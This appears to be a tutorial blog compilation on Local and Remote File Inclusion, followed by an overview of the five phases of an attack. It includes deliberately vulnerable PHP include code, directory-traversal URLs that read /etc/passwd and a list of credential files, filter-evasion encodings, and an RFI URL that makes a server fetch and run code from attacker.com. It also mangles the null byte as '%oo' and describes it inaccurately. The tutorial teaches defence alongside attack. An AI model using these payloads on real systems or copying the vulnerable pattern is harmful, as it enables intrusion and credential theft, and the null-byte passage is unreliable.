LOCAL FILE INCLUSION

• What is Local File Inclusion?

Local File Inclusion (LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.

A typical example of a PHP script vulnerable to LFI is as follows:

<?php
$page = $_GET['page'];
if(isset($page))
include("files/$page");
else
include("index.php");
?>

A legitimate request made to the script could look like this:

 http://victim.com/index.php?page=example.php

This is of little use to a potential attacker, who is more likely to be interested in the files outside the files/ directory. To do this, an attacker could use LFI. The simplest example would be:

 http://victim.com/index.php?page=../../../../etc/passwd

The repeated ../ characters has caused include() to traverse to the root directory, and then include the Unix password file /etc/passwd. Unix /etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.

You may also wish to peruse around in other directories, such as:

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

• Poison Null Byte Attacks:

Every now and again, though, the website may output that /etc/passwd/ cannot be found simply because the server is interpreting the location as if it is /etc/passwd.php/. To correct this, we need to apply what is called a Null Byte. This bit of code looks like: %oo (percent double zero). In SQL, it means 0, but everywhere else in coding, it is interpreted similar to a black hole, such as /dev/null/. This code eliminates the use of an extension. The code would appear as /etc/passwd when entered into the address bar.

http://victim.com/index.php?page=../../../../etc/passwd%oo

• Filter Evasion:

Most good admins will have protected against the simplest LFI attacks, so we should update the example script accordingly.

<?php
$page = str_replace('../', '', $_GET['page']);
if(isset($page))
include("files/$page");
else
include("index.php");
?>

One way to break this defence is to encode one or more characters into hexadecimal. This works because the browser decodes the input, but PHP does not. Our new LFI would be:

http://victim.com/index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd

• Protection:

1. Process URI requests that do not result in a file request, e.g., executing a hook into user code, before continuing below.
2. When a URI request for a file/directory is to be made, build a full path to the file/directory if it exists, and normalize all characters (e.g., %20 converted to spaces).
3. It is assumed that a 'Document Root' fully qualified, normalized, path is known, and this string has a length N. Assume that no files outside this directory can be served.
4. Ensure that the first N characters of the fully qualified path to the requested file is exactly the same as the 'Document Root'. If so, allow the file to be returned. If not, return an error, since the request is clearly out of bounds from what the web-server should be allowed to serve.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

REMOTE FILE INCLUSION

• Whai is RFI ?

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

An attacker can use RFI for:

• Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.

• Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, Javascript to steal the client session cookies).

• Example:

Typically, RFI attacks are performed by setting the value of a request parameter to a URL that refers to a malicious file. Consider the following PHP code:

<?php
$page = $_REQUEST["page"];
include($page.".php");
?>

The first line of code extracts the value of the page parameter from the HTTP request. The second line of code dynamically sets the page name to be included using the extracted value. If the web application does not properly sanitize the value of the page parameter, this code can be exploited.

Consider the following URL:

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicious

In this case the included page name will resolve to:

http://www.attacker.com/malicious.php 

Thus, the remote file will be included and any malicious code in it will be run by the server. Most popular of them are c99 or r57 shell which allows an attacker to browse the filesystem, upload, view, and edit files as well as move files, delete files, and even change permissions, all as the web server.

• Prevention:

The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web application. Now we can improve the detection and blocking of such attacks by creating a blacklist of attack sources and a black list of URLs of remotely included malicious scripts:

1. Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.

2. A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.

3. The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

EXPLORE THE ATTACK

• How does the attack begin ?

Attackers follow a fixed methodology to penetrate into a system. The steps a hacker follows can be broadly divided into five phases:

1. Reconnaissance:

Reconnaissance or Footprinting is consideredthe first pre-attack phase and is a systematic attempt to locate, gather, identify, and record information about the target. The hacker seeks to find out as much information as possible about the victim. Some hackers might dumpster dive to find out more about the victim. Dumpster diving is the act of going through the victim's trash. Another favorite of the hacker is social engineering. A social engineer is a person who can smooth talk other individuals into revealing sensitive information. This might be accomplished by calling the help desk and asking someone to reset a password or by sending an email to an insider telling him he needs to reset an account.

2. Scanning:

Scanning and enumeration is considered the second pre-attack phase. Scanning is the active step of attempting to connect to systems to elicit a response. Enumeration is used to gather more in-depth information about the target, such as open shares and user account information. At this step in the methodology, the hacker is moving from passive information gathering to active information gathering. Hackers begin injecting packets into the network and might start using scanning tools such as Nmap. The goal is to map open ports and applications. Unlike the elite blackhat hacker who attempts to remain stealth, script kiddies might even use vulnerability scanners such as Nessus to scan a victim's network.

3. Gaining Access:

As far as potential damage, this could be considered one of the most important steps of an attack. This phase of the attack occurs when the hacker moves from simply probing the network to actually attacking it. After the hacker has gained access, he can begin to move from system to system, spreading his damage as he progresses. Access can be achieved in many different ways. A hacker might find a vulnerability in the web server's software or might perform a denial of service (DOS) on that server. If the hacker is really bold, he might even walk in and tell the receptionist that he is late for a meeting and will wait in the conference room with network access. Pity the poor receptionist who unknowingly provided network access to a malicious hacker.

4. Maintaining Access:

Hackers are diligent at working on ways to maintain access to the systems they have attacked and compromised. They might attempt to pull down the etc/passwd file or steal other passwords so that they can access other user's accounts. Rootkits are one option for hackers. A rootkit is a set of tools used to help the attacker maintain his access to the system and use it for malicious purposes.

5. Clearing Tracks:

Nothing happens in a void, and that includes computer crime. Hackers are much like other criminals in that they would like to be sure to remove all evidence of their activities. Hackers must also be worried about the files or programs they leave on the compromised system. In order that the target company’s security engineer or network administrator cannot detect the evidence of attack, the hacker needs to delete logs files and replace system binaries with Trojans.

• How do you defend the attack ?

In order to defend a hacker, you have to think from his/her perspective. Being an ethical hacker, you will need to be aware of these tools and techniques to discover their activities and to deploy adequate countermeasures.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...